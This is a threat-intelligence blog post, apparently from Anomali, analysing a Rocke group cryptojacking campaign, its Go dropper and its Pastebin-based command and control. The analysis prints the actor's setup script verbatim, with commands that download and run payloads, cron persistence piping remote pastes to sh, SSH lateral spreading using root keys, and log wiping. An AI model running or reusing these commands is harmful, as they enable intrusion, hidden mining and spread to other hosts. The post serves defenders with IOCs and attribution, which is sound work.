fs-cmsnest-element="template-reference" role="list" class="w-dyn-items"><div role="listitem" class="w-dyn-item"><a href="/blog-categories/research" class="w-inline-block"><div>Research</div></a></div></div></div></div><div class="content-center direction-vertical"><div class="max-width-xlarge"><div class="body_component"><div class="body_component"><div class="blog-style w-embed"><style> .table { width: 100%; margin-bottom: 1rem; color: #212529 } .table th, .table td { padding: 0.75rem; vertical-align: top; border-top: 1px solid #dee2e6 } .table thead th { vertical-align: bottom; border-bottom: 2px solid #dee2e6 } .table tbody+tbody { border-top: 2px solid #dee2e6 } .table-sm th, .table-sm td { padding: 0.3rem } .table-bordered { border: 1px solid #dee2e6 } .table-bordered th, .table-bordered td { border: 1px solid #dee2e6 } .table-bordered thead th, .table-bordered thead td { border-bottom-width: 2px } .table-borderless th, .table-borderless td, .table-borderless thead th, .table-borderless tbody+tbody { border: 0 } .table-striped tbody tr:nth-of-type(odd) { background-color: rgba(0, 0, 0, 0.05) } .table-hover tbody tr:hover { color: #212529; background-color: rgba(0,0,0,0.075) } .table-anomali,.table-anomali>th,.table-anomali>td { background-color: #fceabd } .table-anomali th, .table-anomali td, .table-anomali thead th, .table-anomali tbody+tbody { border-color: #fad985 } .table-hover .table-anomali:hover { background-color: #fbe2a5 } .table-hover .table-anomali:hover > td, .table-hover .table-anomali:hover>th { background-color: #fbe2a5 } .table-anomali-blue,.table-anomali-blue>th,.table-anomali-blue>td { background-color: #b8d9fe } .table-anomali-blue th, .table-anomali-blue td, .table-anomali-blue thead th, .table-anomali-blue tbody+tbody { border-color: #7ab8fe } .table-hover .table-anomali-blue:hover { background-color: #9fccfe } .table-hover .table-anomali-blue:hover > td, .table-hover .table-anomali-blue:hover>th { background-color: #9fccfe } .table-primary,.table-primary>th,.table-primary>td { background-color: #b8daff } .table-primary th, .table-primary td, .table-primary thead th, .table-primary tbody+tbody { border-color: #7abaff } .table-hover .table-primary:hover { background-color: #9fcdff } .table-hover .table-primary:hover > td, .table-hover .table-primary:hover>th { background-color: #9fcdff } .table-secondary,.table-secondary>th,.table-secondary>td { background-color: #d6d8db } .table-secondary th, .table-secondary td, .table-secondary thead th, .table-secondary tbody+tbody { border-color: #b3b7bb } .table-hover .table-secondary:hover { background-color: #c8cbcf } .table-hover .table-secondary:hover > td, .table-hover .table-secondary:hover>th { background-color: #c8cbcf } .table-success,.table-success>th,.table-success>td { background-color: #c3e6cb } .table-success th, .table-success td, .table-success thead th, .table-success tbody+tbody { border-color: #8fd19e } .table-hover .table-success:hover { background-color: #b1dfbb } .table-hover .table-success:hover > td, .table-hover .table-success:hover>th { background-color: #b1dfbb } .table-info,.table-info>th,.table-info>td { background-color: #bee5eb } .table-info th, .table-info td, .table-info thead th, .table-info tbody+tbody { border-color: #86cfda } .table-hover .table-info:hover { background-color: #abdde5 } .table-hover .table-info:hover > td, .table-hover .table-info:hover>th { background-color: #abdde5 } .table-warning,.table-warning>th,.table-warning>td { background-color: #ffeeba } .table-warning th, .table-warning td, .table-warning thead th, .table-warning tbody+tbody { border-color: #ffdf7e } .table-hover .table-warning:hover { background-color: #ffe8a1 } .table-hover .table-warning:hover > td, .table-hover .table-warning:hover>th { background-color: #ffe8a1 } .table-danger,.table-danger>th,.table-danger>td { background-color: #f5c6cb } .table-danger th, .table-danger td, .table-danger thead th, .table-danger tbody+tbody { border-color: #ed969e } .table-hover .table-danger:hover { background-color: #f1b0b7 } .table-hover .table-danger:hover > td, .table-hover .table-danger:hover>th { background-color: #f1b0b7 } .table-light,.table-light>th,.table-light>td { background-color: #fdfdfe } .table-light th, .table-light td, .table-light thead th, .table-light tbody+tbody { border-color: #fbfcfc } .table-hover .table-light:hover { background-color: #ececf6 } .table-hover .table-light:hover > td, .table-hover .table-light:hover>th { background-color: #ececf6 } .table-dark,.table-dark>th,.table-dark>td { background-color: #c6c8ca } .table-dark th, .table-dark td, .table-dark thead th, .table-dark tbody+tbody { border-color: #95999c } .table-hover .table-dark:hover { background-color: #b9bbbe } .table-hover .table-dark:hover > td, .table-hover .table-dark:hover>th { background-color: #b9bbbe } .table-active,.table-active>th,.table-active>td { background-color: rgba(0, 0, 0, 0.075) } .table-hover .table-active:hover { background-color: rgba(0, 0, 0, 0.075) } .table-hover .table-active:hover > td, .table-hover .table-active:hover>th { background-color: rgba(0, 0, 0, 0.075) } .table .thead-dark th { color: #fff; background-color: #343a40; border-color: #454d55 } .table .thead-light th { color: #495057; background-color: #e9ecef; border-color: #dee2e6 } .table-dark { color: #fff; background-color: #343a40 } .table-dark th, .table-dark td, .table-dark thead th { border-color: #454d55 } .table-dark.table-bordered { border: 0 } .table-dark.table-striped tbody tr:nth-of-type(odd) { background-color: rgba(255, 255, 255, 0.05) } .table-dark.table-hover tbody tr:hover { color: #fff; background-color: rgba(255, 255, 255, 0.075) } @media (max-width: 575.98px) { .table-responsive-sm { display:block; width: 100%; overflow-x: auto; -webkit-overflow-scrolling: touch } .table-responsive-sm>.table-bordered { border: 0 } } @media (max-width: 767.98px) { .table-responsive-md { display:block; width: 100%; overflow-x: auto; -webkit-overflow-scrolling: touch } .table-responsive-md>.table-bordered { border: 0 } } @media (max-width: 991.98px) { .table-responsive-lg { display:block; width: 100%; overflow-x: auto; -webkit-overflow-scrolling: touch } .table-responsive-lg>.table-bordered { border: 0 } } @media (max-width: 1199.98px) { .table-responsive-xl { display:block; width: 100%; overflow-x: auto; -webkit-overflow-scrolling: touch } .table-responsive-xl>.table-bordered { border: 0 } } .table-responsive { display: block; width: 100%; overflow-x: auto; -webkit-overflow-scrolling: touch } .table-responsive>.table-bordered { border: 0 } .article-text p, .article-text ul, .article-body .article-text table { margin-bottom: 2rem } .pre { display: block; font-size: 87.5%; color: #fff } .pre code { font-size: inherit; color: black; word-break: normal } .pre-scrollable { max-height: 340px; overflow-y: scroll } .pre,code,kbd,samp { font-family: SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace; font-size: 1em } .pre { margin-top: 0; margin-bottom: 1rem; overflow: auto; -ms-overflow-style: scrollbar } </style></div><div class="text-rich-text w-condition-invisible w-dyn-bind-empty w-richtext"></div><div class="imported_body_text"><div wb-element="text-data" class="import_data"><h2>Summary</h2><p>The “Rocke group”, a Chinese threat actor group who specializes in cryptojacking, has shifted gears on how they’re stealing your cycles. Rocke is actively updating and pushing a new dropper using Pastebin for Command and Control (C2). Recent updates to the C2 as of March 13th, 2019 have been seen, which leads researchers to believe this campaign is ongoing. According to VirusTotal, the threat detection of the new dropper is nearly non-existent. The group has been observed in previous campaigns to use “ld.so.preload” function to hook libc functions. The hooking is used to hide the dropper and the mining software installed by the malware and prevents it from showing up in the “currently running” process list. This tactic is being utilized by the group in this new campaign. The miner uses a private mining pool hosted on DigitalOcean which is a change in the threat actor’s previous tactics.</p><h2>Introduction</h2><p>The threat actor group, Rocke, was first reported by Cisco Talos in August 2018.[1] On January 17th, 2019, Palo Alto Networks’ Unit 42 reported on a campaign conducted by the group that was active in October 2018, in which the group utilized a malware written in Python to orchestrate the infection and spreading of their coinminer.[2] On March 12th, 2019, Anomali Research has, with high confidence, identified a new active campaign that we believe is being conducted by Rocke. The objective of the campaign, similar to other Rocke activity, is to drop a miner onto a machine to mine Monero cryptocurrency. This ongoing campaign has extensive Tactics Techniques and Procedures (TTPs) that overlap with the report published by Unit 42.</p><p>This campaign is different from prior activity because a new dropper was observed being used by Rocke that is written in Go (Golang) instead of Python. The detection for the malware on VirusTotal (VT) is nearly non-existent. Figure 1, below, shows the detections for the most recent sample submitted to VT. It can be seen that only one engine successfully detected it as malicious. The low detection rate of the malware coupled with the techniques that prevent the Rocke malicious processes from showing up in the running processes of victim machines, raises the possibility that this campaign has been successfully running for weeks.</p><p style="text-align: center;"><em><img alt="Scanning results from VirusTotal for one of the malware samples" src="https://cdn.filestackcontent.com/iytoepbhR2ywK2oGKU1Q"/><br/> Figure 1: Scanning results from VirusTotal for one of the malware samples.</em></p><h2>Technical Details</h2><h3>Analysis of the Dropper</h3><p>The samples analyzed are packed with UPX. The UPX header has been modified to break the unpacker provided by the UPX project. Instead of having the “UPX!” string, it has been replaced with “LSD!”. Repairing the header is needed to unpack the samples using the unpacker provided by the UPX team.</p><p>The dropper is written in Go (Golang) and the estimated source code structure, based on the decompiler, is shown below:</p><pre> Package main: /root/go/src/github.com/hippies/LSD File: main.go goatt Lines: 12 to 17 (5) main Lines: 17 to 34 (17) /root/go/src/github.com/hippies/LSD/LSDB File: a.go _kBytes Lines: 13 to 27 (14) KWR Lines: 27 to 36 (9) File: b.go _libBytes Lines: 10 to 17 (7) LibWrite Lines: 17 to 25 (8) File: c.go _netdnsinitBytes Lines: 11 to 18 (7) _netdnsserviceBytes Lines: 18 to 26 (8) NetdnsWrite Lines: 26 to 37 (11) /root/go/src/github.com/hippies/LSD/LSDA File: a.go getiplista Lines: 12 to 37 (25) run Lines: 37 to 86 (49) runtwo Lines: 86 to 98 (12) Ago Lines: 98 to 108 (10) (Ago)func1 Lines: 103 to 106 (3) File: b.go getiplistb Lines: 18 to 42 (24) generateTask Lines: 42 to 54 (12) cmd Lines: 54 to 81 (27) (cmd)func1 Lines: 62 to 98 (36) cmdtwo Lines: 81 to 93 (12) bgo Lines: 93 to 113 (20) (bgo)func1 Lines: 98 to 101 (3) Bbgo Lines: 113 to 118 (5) /root/go/src/github.com/hippies/LSD/LSDC File: a.go Read Lines: 17 to 43 (26) PathExists Lines: 43 to 54 (11) CopyFile Lines: 54 to 65 (11) Mkdir Lines: 65 to 69 (4) Writefile Lines: 69 to 79 (10) Writefiletwo Lines: 79 to 88 (9) Delfile Lines: 88 to 97 (9) Changetime Lines: 97 to 105 (8) Cmdexec Lines: 105 to 111 (6) Checkupdate Lines: 111 to 129 (18) Getip Lines: 129 to 149 (20) Getipb Lines: 149 to 164 (15) Cron Lines: 164 to 173 (9)</pre><p>The main execution process can be summarized in the following steps:</p><ol><li>Delete “/etc/ld.so.preload” if it exists</li><li>Get the PID of the process and writes it to “/tmp/.lsdpid”</li><li>Uses “chattr -i” to mark the PID file protected so it cannot be modified</li><li>Copies itself from “/tmp/kthrotlds” to “/usr/sbin/kthrotlds”</li><li>Turns the modified time stamp on the moved file back 416 days</li><li>Installs an “init.d” startup script to “/etc/init.d/netdns” and a systemd service script to “/usr/lib/systemd/system/netdns.service”; the modified time is also changed for these files in the same way</li><li>Enabling the service on the compromised system by executing: “chkconfig --add netdns” and “systemctl enable netdns”</li><li>Removes the files “/tmp/kthrotlds” and “/tmp/kintegrityds”</li><li>Writes code to “/usr/local/lib/libcset.c”</li><li>Compiles it with “gcc /usr/local/lib/libcset.c -Wall -shared -fPIC -ldl -o /usr/local/lib/libcset.so”</li><li>If GCC is not installed it tries to install it and recompile “yum -y install gcc -y||apt-get -y install gcc”</li><li>Adds the path to the shared object to “/etc/ld.so.preload” and protects the file from modifications</li><li>Persistence is added through Cron by executing echo "*/10 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh" | crontab - and by adding “*/15 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh” to “/var/spool/cron/crontabs/root”</li><li>Checking for updates by checking the version listed at “https://pastebin.com/raw/HWBVXK6H”</li><li>Installs the Monero miner at “/tmp/kintegrityds” and protects it</li><li>The miner connects to a private pool hosted on DigitalOcean with IP and port of: 134.209.104.20:51640</li></ol><p>The malware also starts an “attack” thread that scans for SSH and Redis servers. The malware uses “ident.me” to determine the machines external host so it does not attack itself.</p><h3>Command and Control</h3><p>The malware uses Pastebin for Command and Control (C2). The URL “https://pastebin[.]com/HWBVXK6H” is used to check for the latest version of the malware. If a new version is available, the malware reaches out to “https://pastebin[.]com/yPRSa0ki”. The paste shown below serves as a redirect to the actual setup stript.</p><pre> (curl -fsSL https://pastebin.com/raw/D8E71JBJ||wget -q -O- https://pastebin.com/raw/D8E71JBJ)|sed 's/ //'|sh</pre><p>The setup script in paste D8E71JBJ, shown below, kills other mining malware and downloads and executes the threat actors’ malware instead. It will also try to use known SSH hosts and the SSH key on the machine to spread latterly.</p><pre> export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin echo "*/10 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh" | crontab - mkdir -p /tmp chmod 1777 /tmp ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -9 ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "watchdog"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "/tmp/devtool"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "systemctI"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "watchdogs"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "ksoftirqds"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "suolbcc"|awk '{print $2}'|xargs kill -9 ps aux|grep -v grep|grep -v kintegrityds|awk '{if($3&gt;=80.0) print $2}'|xargs kill -9 yum -y install coreutils||apt-get -y install coreutils apt-get install cron -y||yum install crontabs -y||apk add cron -y if [ ! -f "/tmp/.lsdpid" ]; then ARCH=$(uname -m) if [ ${ARCH}x = "x86_64x" ]; then (curl -fsSL http://sowcar.com/t6/678/1552060180x1822611359.jpg -o /tmp/kthrotlds||wget -q http://sowcar.com/t6/678/1552060180x1822611359.jpg -O /tmp/kthrotlds) &amp;&amp; chmod +x /tmp/kthrotlds elif [ ${ARCH}x = "i686x" ]; then (curl -fsSL http://sowcar.com/t6/678/1552060225x1822611359.jpg -o /tmp/kthrotlds||wget -q http://sowcar.com/t6/678/1552060225x1822611359.jpg -O /tmp/kthrotlds) &amp;&amp; chmod +x /tmp/kthrotlds else (curl -fsSL http://sowcar.com/t6/678/1552060225x1822611359.jpg -o /tmp/kthrotlds||wget -q http://sowcar.com/t6/678/1552060225x1822611359.jpg -O /tmp/kthrotlds) &amp;&amp; chmod +x /tmp/kthrotlds fi nohup /tmp/kthrotlds &gt;/dev/null 2&gt;&amp;1 &amp; elif [ ! -f "/proc/$(cat /tmp/.lsdpid)/stat" ]; then ARCH=$(uname -m) if [ ${ARCH}x = "x86_64x" ]; then (curl -fsSL http://sowcar.com/t6/678/1552060180x1822611359.jpg -o /tmp/kthrotlds||wget -q http://sowcar.com/t6/678/1552060180x1822611359.jpg -O /tmp/kthrotlds) &amp;&amp; chmod +x /tmp/kthrotlds elif [ ${ARCH}x = "i686x" ]; then (curl -fsSL http://sowcar.com/t6/678/1552060225x1822611359.jpg -o /tmp/kthrotlds||wget -q http://sowcar.com/t6/678/1552060225x1822611359.jpg -O /tmp/kthrotlds) &amp;&amp; chmod +x /tmp/kthrotlds else (curl -fsSL http://sowcar.com/t6/678/1552060225x1822611359.jpg -o /tmp/kthrotlds||wget -q http://sowcar.com/t6/678/1552060225x1822611359.jpg -O /tmp/kthrotlds) &amp;&amp; chmod +x /tmp/kthrotlds fi nohup /tmp/kthrotlds &gt;/dev/null 2&gt;&amp;1 &amp; fi if [ -f /root/.ssh/known_hosts ] &amp;&amp; [ -f /root/.ssh/id_rsa.pub ]; then for h in $(grep -oE "([0-9]{1,3}.){3}[0-9]{1,3}" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh &gt;/dev/null 2&gt;&amp;1 &amp;' &amp; done fi echo 0&gt;/var/spool/mail/root echo 0&gt;/var/log/wtmp echo 0&gt;/var/log/secure echo 0&gt;/var/log/cron # </pre><p>The Pastebin profile used by the actor for this campaign is shown below. It can be seen that these pastes were added on February 24th, 2019.</p><p style="text-align: center;"><em><img alt="Pastebin profile used by the threat actor" src="https://cdn.filestackcontent.com/ujNmkh1WSJqf7vICOCGn"/><br/> Figure 2: Pastebin profile used by the threat actor</em></p><p>The server hosting the malware has the appearance of a free Chinese image hosting site, shown in Figure 3 below. The page asks a visitor to upload their identity photo for the Chinese online shopping website, Taobao.</p><p style="text-align: center;"><em><img alt="Image hosting site from where the malware is downloaded from" src="https://cdn.filestackcontent.com/DvfNdcNyRlGMU0MbeUCU"/><br/> Figure 3: Image hosting site from where the malware is downloaded from.</em></p><p>According to the Whois record, shown below, the fake image hosting domain was created on June 21st, 2018. It is also registered by the same email (4592248@gmail[.]com) as another domain that was used in an earlier Rocke campaign which indicates that it is likely the site is controlled by the threat group.[3]</p><pre> Domain Name: SOWCAR.COM Registry Domain ID: 2277522871_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.ename.com Registrar URL: http://www.ename.net Updated Date: 2019-03-08T01:38:36Z Creation Date: 2018-06-21T11:14:39Z Registry Expiry Date: 2019-06-21T11:14:39Z Registrar: eName Technology Co., Ltd. Registrar IANA ID: 1331 Registrar Abuse Contact Email: abuse@ename.com Registrar Abuse Contact Phone: 86.4000044400 Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Name Server: DALE.NS.CLOUDFLARE.COM Name Server: JOAN.NS.CLOUDFLARE.COM DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: Registry Registrant ID:Not Available From Registry Registrant Name: LuWei Registrant Organization: Lu Wei Registrant Street: SiChuan ZhongLu 668 Hao 8 Lou Registrant City: ShangHai Registrant State/Province: ShangHai Registrant Postal Code: 200000 Registrant Country: CN Registrant Phone: +86.2139003725 Registrant Phone Ext: Registrant Fax: +86.2139003725 Registrant Fax Ext: Registrant Email: 4592248@gmail.com Registry Admin ID:Not Available From Registry</pre><h2>Overlapping TTPs with previous campaigns</h2><p>The current campaign has numerous TTPs overlapping with the previous campaign reported by Unit 42. In both campaigns, the group uses Pastebin for C2 and the C2 system depends on 3 public pastes. One paste serves the latest version, one acts as a redirect to the third that is used to initialize the infection. The redirect uses either “cURL” or “wget” to fetch the initialization script from the paste. The paste is “piped” to either “bash” or “sh” after some cleanup. In addition to the similarities in the structures, the user account names also appear to follow a similar pattern. In this campaign the username is “SYSTEMTEN” while last campaign username was “SYSTEAM”. The first five characters of the username (SYSTE) may be an indication of other Rocke activity.</p><p>The filenames of the payloads are also similar in the two latest reported campaigns. Below are the URLs used to download the payload in this campaign and the campaign reported by Unit 42. The filenames have the same structure, with some of the numbers overlapping.</p><pre> http://sowcar.com/t6/678/1552060180x1822611359.jpg https://master.minerxmr.ru/2/1551434778x2728329032.jpg</pre><p>The malware uses cron for persistence. The similar crontab entries are shown below. The only difference between the entries are the ID of paste used.</p><p>Cron jobs created by the Python version of the malware:</p><pre> "*/10 * * * * root (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh ##" "*/15 * * * * (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh ##"</pre><p>Cron jobs created by the Go version of the malware:</p><pre> */10 * * * * root (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh ## */15 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh ##</pre><p>In this campaign, the threat actor also uses “init” and “systemd” services for persistence. The name of the service is “netdns.” Below is a snippet from the setup script used by Rocke in a previous campaign that also uses the serviced called netdns. After the file is created, the access and modified time is changed before the file is marked as non-modifiable. The same technique is used by the new malware written in Go.</p><pre> curl -fsSL --connect-timeout 120 https://master.minerxmr.ru/Pep/4 -o /etc/init.d/netdns||wget https://master.minerxmr.ru/Pep/4 -O /etc/init.d/netdns) &amp;&amp; chmod 777 /etc/init.d/netdns &amp;&amp; touch -acmr /bin/sh /etc/init.d/netdns &amp;&amp; chattr +i /etc/init.d/netdns</pre><p>The spreading technique observed by Anomali researchers is the same one used in previous campaigns. The malware in both previous and ongoing campaign assumes that it has root level access on the machine. Below are code snippets from the current campaign and the campaign reported by Unit 42, where the threat actor uses ssh keys and known hosts if they are available to infect other machines.</p><p><strong>Last campaign</strong></p><pre> if [ -f /root/.ssh/known_hosts ] &amp;&amp; [ -f /root/.ssh/id_rsa.pub ]; then for h in $(grep -oE "([0-9]{1,3}.){3}[0-9]{1,3}" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh' &amp; done fi</pre><p><strong>Current campaign</strong></p><pre> if [ -f /root/.ssh/known_hosts ] &amp;&amp; [ -f /root/.ssh/id_rsa.pub ]; then for h in $(grep -oE "([0-9]{1,3}.){3}[0-9]{1,3}" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh &gt;/dev/null 2&gt;&amp;1 &amp;' &amp; done fi</pre><p>In addition to the propagation over SSH, the new malware tries to compromise Redis servers just like the Python-based malware.</p><p>There is also overlap of infrastructure. The email used to register the sowcar[.]com domain also registered thyrsi[.]com. This domain was reported on and linked to the same threat group in a report by Cisco Talos in December 2018. The domains registered by this email address is shown in the figure below.</p><p style="text-align: center;"><em><img alt="Domains registered by the same email address" src="https://cdn.filestackcontent.com/Oc8r9TtSyeKfqURLxYoO"/><br/> Figure 4: Domains registered by the same email address.</em></p><h2>Conclusion</h2><p>Anomali Labs has detected a new campaign by the threat group Rocke. In this campaign, the group has changed from using a Python-based malware to a malware written in Golang. The detection of this new malware is nearly non-existent. In addition, the group uses a private mining pool to reduce the risks of being detected.</p><h2>Mitre ATT&amp;CK</h2><ul><li>T1190 Exploit Public-Facing Application</li><li>T1078 Valid Accounts</li><li>T1168 Local Job Scheduling</li><li>T1110 Brute Force</li><li>T1222 File Permissions Modification</li><li>T1021 Remote Services</li><li>T1064 Scripting</li><li>T1045 Software Packing</li><li>T1071 Standard Application Layer Protocol</li><li>T1099 Timestomp</li><li>T1055 Process Injection</li><li>T1036 Masquerading</li></ul><h2>IOCs</h2><p><strong>URLS</strong></p><pre> https://pastebin[.]com/raw/yPRSa0ki https://pastebin[.]com/raw/wDBa7jCQ https://pastebin[.]com/raw/D8E71JBJ https://pastebin[.]com/raw/HWBVXK6H https://pastebin[.]com/raw/qs3ger9z http://sowcar[.]com/t6/678/1552060180x1822611359.jpg http://sowcar[.]com/t6/678/1552060225x1822611359.jpg http://sowcar[.]com/t6/682/1552580197x2890211702.jpg</pre><p><strong>SHA256</strong></p><pre> 029e79bc2e232d21b61c09463dd89e515606b7b9df771572627394cbe59e1cbd 93efdee9def596b93517699958e7a5c3f0bae88e220cb08593c4712f143696dd 3a4391293d1a7fbd5cfc34258aa0cfcd57abb8b4453e47ea293c572fbf1862ad 60aadabd2f3f1465f239d2721a663f4b9f9d15e739dcb14df64e241c2d37e30c 9df3ae6da6b262f5dea6a1f5438127cd4cfa8d718997b4e90b107fabb2b392be e2db2dca7d84098192c5562c299a76330ca556ac30d583ac8079fe63b61e94d5</pre><p><strong>Mining pool</strong></p><p>134.209.104.20:51640</p><h2>Endnotes</h2><ul><li>David Liedenberg, “<a href="https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html" target="_blank">Rocke: The Champion of Monero Miners</a>,” Talos Blog, accessed March 14, 2019, published August 30, 2018.</li><li>Xingyu Jin and Claud Xiao, “<a href="https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/" target="_blank">Malware Used by “Rocke” Group Evolves to Evade Detection by Cloud Security Products</a>,” Palo Alto Networks, accessed March 14, 2019, published January 17, 2019.</li><li>David Liebenberg and Andrew Williams, “<a href="https://blog.talosintelligence.com/2018/12/cryptomining-campaigns-2018.html" target="_blank">Connecting the dots between recently active cryptominers</a>,” Talos Blog, accessed March 14, 2019, published December 18, 2018.</li></ul></div><div wb-element="parsed-html-container" class="text-rich-text"></div></div><div class="html_parsing_code w-embed w-script"><script> // Get the text string to be parsed as HTML const textElement = document.querySelector('[wb-element="text-data"]'); if (textElement) { const textString = textElement.textContent; // Create a temporary element to hold the parsed HTML const tempElement = document.createElement('div'); tempElement.innerHTML = textString; // Get the parsed HTML content const parsedHTML = tempElement; // Append the parsed HTML to the container element const container = document.querySelector('[wb-element="parsed-html-container"]'); if (container) { container.appendChild(parsedHTML); } else { console.error('Container element not found.'); } } else { console.error('Text element not found.'); } </script></div></div></div></div></div><div class="padding-section-xsmall"><div class="max-width-small align-center"><a href="#" class="button is-blog w-condition-invisible w-dyn-bind-empty w-button"></a><div class="padding-bottom padding-large"></div></div><div class="w-embed"><div class="sharethis-inline-share-buttons"></div></div><div></div></div></div></div></div></section><section class="section_resource_cta_final background-color-gradient-7"><div class="padding-global"><div class="container-large"><div class="padding-section-large"><div class="w-layout-grid info_component align-top"><div class="info_content-left"><div class="info_content"><h2>Get the Latest Anomali Updates and Cybersecurity News – Straight To Your Inbox<br/></h2></div></div><div class="info_content-right"><div class="info_text-wrapper"><div class="margin-bottom margin-small"><div class="heading-style-h3">Become a subscriber to the Anomali Newsletter</div></div><div class="margin-bottom margin-medium"><div>Receive a monthly summary of our latest threat intelligence content, research, news, events, and more.</div></div><div class="button-group"><a href="/resources/the-anomali-newsletter" class="button is-primary w-inline-block"><div class="button-text-wrapper"><div class="text-size-button">Subscribe Today</div><div class="dynamic-arrow"><img src="https://cdn.prod.website-files.com/6453db2ad32b573c40a15c49/64cd3ce07105a169a5b63e78_button-arrow-state1.svg" loading="lazy" alt="" class="icon-1x1-xsmall partial-arrow"/><div class="arrow-line"></div></div></div><img src="https://cdn.prod.website-files.com/6453db2ad32b573c40a15c49/6509cecee7cab371a49e2e4a_primary-button-blur.svg" loading="lazy" alt="" class="button-gradient"/></a></div></div></div></div></div></div></div></section><section class="section_use-cases"><div class="padding-global"><div class="container-large"><div class="padding-section-large"><div class="margin-bottom margin-xxlarge"><div class="text-align-center"><div class="align-center max-width-xlarge"><h2>Explore more topics</h2></div></div></div><div class="w-dyn-list"><div role="list" class="card_list blog-category w-dyn-items"><div role="listitem" class="collection-item w-dyn-item"><a href="#" class="blog-category_card background-color-alice-blue w-inline-block"><div filter-parameter="anomali" class="blog-category_content text-align-left"><div class="button-group"><div class="button is-link is-icon full-width"><div class="text-align-left">Anomali</div><div class="icon-embed-xxsmall w-embed"><svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M6 3L11 8L6 13" stroke="CurrentColor" stroke-width="1.5"/> </svg></div></div></div></div></a></div><div role="listitem" class="collection-item w-dyn-item"><a href="#" class="blog-category_card background-color-alice-blue w-inline-block"><div filter-parameter="anomali-copilot" class="blog-category_content text-align-left"><div class="button-group"><div class="button is-link is-icon full-width"><div class="text-align-left">Anomali Copilot</div><div class="icon-embed-xxsmall w-embed"><svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M6 3L11 8L6 13" stroke="CurrentColor" stroke-width="1.5"/> </svg></div></div></div></div></a></div><div role="listitem" class="collection-item w-dyn-item"><a href="#" class="blog-category_card background-color-alice-blue w-inline-block"><div filter-parameter="anomali-cyber-watch" class="blog-category_content text-align-left"><div class="button-group"><div class="button is-link is-icon full-width"><div class="text-align-left">Anomali Cyber Watch</div><div class="icon-embed-xxsmall w-embed"><svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M6 3L11 8L6 13" stroke="CurrentColor" stroke-width="1.5"/> </svg></div></div></div></div></a></div><div role="listitem" class="collection-item w-dyn-item"><a href="#" class="blog-category_card background-color-alice-blue w-inline-block"><div filter-parameter="anomali-match" class="blog-category_content text-align-left"><div class="button-group"><div class="button is-link is-icon full-width"><div class="text-align-left">Anomali Security Analytics</div><div class="icon-embed-xxsmall w-embed"><svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M6 3L11 8L6 13" stroke="CurrentColor" stroke-width="1.5"/> </svg></div></div></div></div></a></div><div role="listitem" class="collection-item 